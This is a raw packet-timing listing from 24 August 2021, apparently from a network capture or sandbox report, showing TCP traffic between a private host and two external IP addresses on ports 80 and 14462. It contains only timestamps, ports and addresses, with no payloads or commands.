Aug 24, 2021 08:46:58.657061100 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657082081 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657102108 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657125950 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657162905 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657187939 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657211065 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657232046 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657254934 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657277107 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657299042 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657320976 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657342911 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657373905 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657396078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.665313959 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669297934 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669353962 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669382095 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669404030 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669425011 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669431925 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669447899 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669471025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669492960 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669516087 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669528961 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669538021 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669564962 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669579983 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669589043 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669609070 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669619083 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669641972 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669666052 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669676065 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669687986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669706106 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669712067 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669733047 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669734955 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669759989 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669775009 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669780970 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669802904 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669811964 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669827938 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669851065 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669851065 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669874907 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669891119 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669898033 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669922113 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669924021 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669948101 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669950962 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669975996 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.669975996 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.669998884 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670002937 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670026064 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670030117 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670051098 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670054913 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670073032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670084000 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670095921 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670108080 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670120955 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670134068 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670149088 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670171976 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670177937 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670209885 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670209885 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670233965 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670237064 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670260906 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670263052 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670284033 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670286894 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670308113 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670316935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670331955 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670341969 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670353889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670371056 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670376062 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670397043 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670408010 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670423985 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670444012 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670448065 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670469999 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670485020 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670494080 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670511961 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670516014 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670538902 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670547962 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670562983 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670572042 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670586109 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670593977 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670612097 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670617104 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670638084 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670638084 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670660973 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670661926 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670684099 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670686007 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670706987 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670707941 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670730114 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670731068 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670754910 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670754910 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670778990 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670779943 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670804024 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670809031 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670830965 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670834064 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670838118 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670857906 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670874119 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670881033 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670906067 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670913935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670928955 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670952082 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670952082 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.670974016 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.670989990 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671000004 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671015978 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671025038 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671049118 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671049118 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671072960 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671072960 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671097040 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671097040 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671144009 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671152115 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671159029 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671169996 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671195030 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671217918 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671220064 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671246052 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671262980 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671269894 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671292067 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671293974 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671319008 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671325922 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671343088 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671345949 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671365976 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671370029 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671390057 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671391964 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671412945 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671416044 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671438932 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671441078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671463966 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671467066 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671489000 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671489954 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671513081 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671513081 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671535969 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671539068 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671555996 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671559095 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671578884 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671586990 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671600103 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671611071 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671623945 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671647072 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671655893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671668053 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671690941 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671699047 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671713114 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671721935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671736002 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671757936 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671758890 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671782017 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671791077 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671809912 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671829939 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671833992 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671857119 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671864986 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671881914 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671904087 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671904087 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671927929 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671942949 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671952009 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.671967983 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.671976089 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672000885 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672013044 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672025919 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672043085 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672053099 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672065973 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672087908 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672090054 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672115088 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672135115 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672141075 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672144890 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672169924 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672172070 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672193050 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672194958 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672219038 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672219992 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672244072 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672244072 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672267914 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672269106 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672291994 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672292948 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672316074 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672317028 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672339916 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672341108 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672363997 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672368050 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672388077 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672389030 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672415972 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672415972 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672439098 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672441006 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672463894 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672466993 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672487974 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672491074 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672512054 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672514915 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672535896 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672538996 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672560930 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672561884 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672585011 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672586918 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672609091 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672610998 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672631025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.672633886 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672662973 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.672686100 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.720840931 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.739149094 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:46:58.791357994 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:46:58.808605909 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.874842882 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:46:59.160132885 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.180846930 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.180882931 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.180902004 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.180921078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.180937052 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.180952072 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.180969954 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.180985928 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181001902 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181015015 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181016922 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181035995 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181052923 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181066990 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181078911 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181082964 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181113005 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181130886 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181150913 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181165934 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181181908 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181190014 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181194067 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181207895 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181221008 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181246042 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181250095 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181266069 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181273937 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181282043 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181298018 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181302071 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181313992 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181330919 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181330919 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181344032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181363106 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181376934 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181391954 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181396961 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181402922 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181423903 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181437969 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181454897 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181462049 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181471109 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181494951 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181499004 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181514978 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181519032 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181554079 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181565046 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181580067 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181595087 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181610107 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181619883 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181627035 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181642056 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181649923 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181675911 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181690931 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181706905 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181721926 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181745052 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181759119 CEST	80	49719	188.34.200.103	192.168.2.7
